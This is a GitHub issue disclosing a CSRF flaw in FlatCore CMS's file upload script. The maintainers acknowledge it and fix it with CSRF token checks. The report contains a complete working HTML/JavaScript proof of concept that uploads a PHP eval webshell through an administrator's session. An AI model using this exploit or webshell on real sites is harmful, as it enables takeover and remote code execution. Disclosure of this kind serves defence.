Skip to content
This repository has been archived by the owner on Jan 5, 2023. It is now read-only.

Bug Report: CSRF Vulnerability in files.upload-script.php on FlatCore #39

Closed
4rog opened this issue May 26, 2019 · 3 comments
Closed

Bug Report: CSRF Vulnerability in files.upload-script.php on FlatCore #39

4rog opened this issue May 26, 2019 · 3 comments

Comments

@4rog
Copy link

4rog commented May 26, 2019

Title: CSRF Vulnerability in files.upload-script.php on FlatCore
Date: 26-May-2019
Discovered by: @Satuer from ABT Labs
Security: high (will cause the webshell to upload)
Software: https://github.com/flatCore/flatCore-CMS/archive/1.4.7.4.zip

Code: files.upload-script.php
There is no csrf check, only have a administrator check.(Moreover, there is no check on the file type, and did not change the uploaded file name)
CatchA365

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background.

Exploit:
We assume that FlatCore is installed at http://192.168.62.129/flatCore. Our target is acp/core/files.upload-script.php which is the page used to upload a new file. The given POC will upload a webshell to the website.

<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "/flatCore/acp/core/files.upload-script.php", true);
xhr.setRequestHeader("Accept", "application/json");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=--------795986992");
xhr.withCredentials = "true";
var body = "----------795986992\r\n" +
"Content-Disposition: form-data; name=\"upload_destination\"\r\n" +
"\r\n" +
"../content/\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"w\"\r\n" +
"\r\n" +
"600\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"h\"\r\n" +
"\r\n" +
"500\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"fz\"\r\n" +
"\r\n" +
"2800\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"unchanged\"\r\n" +
"\r\n" +
"\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"testwebshell.php\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php eval($_REQUEST['parm']);?>\r\n" +
"----------795986992--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

Before visit the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The webshell have been uploaded.

Screenshots:
First, administrator login.
微信截图_20190526222222

Then, administrator visit the malicious webpage.
微信截图_20190526222304

Attacker visit webshell.
微信截图_20190526222326

Suggest: Check CSRF tokens in all POST request.

@patkon
Copy link
Member

patkon commented May 28, 2019

Thank you! I will fix this as soon as possible.

@patkon
Copy link
Member

patkon commented Jun 12, 2019

Check CSRF tokens before upload files
13892f9

@4rog
Copy link
Author

4rog commented Jun 13, 2019

Verified, no longer work.

@4rog 4rog closed this as completed Jun 13, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants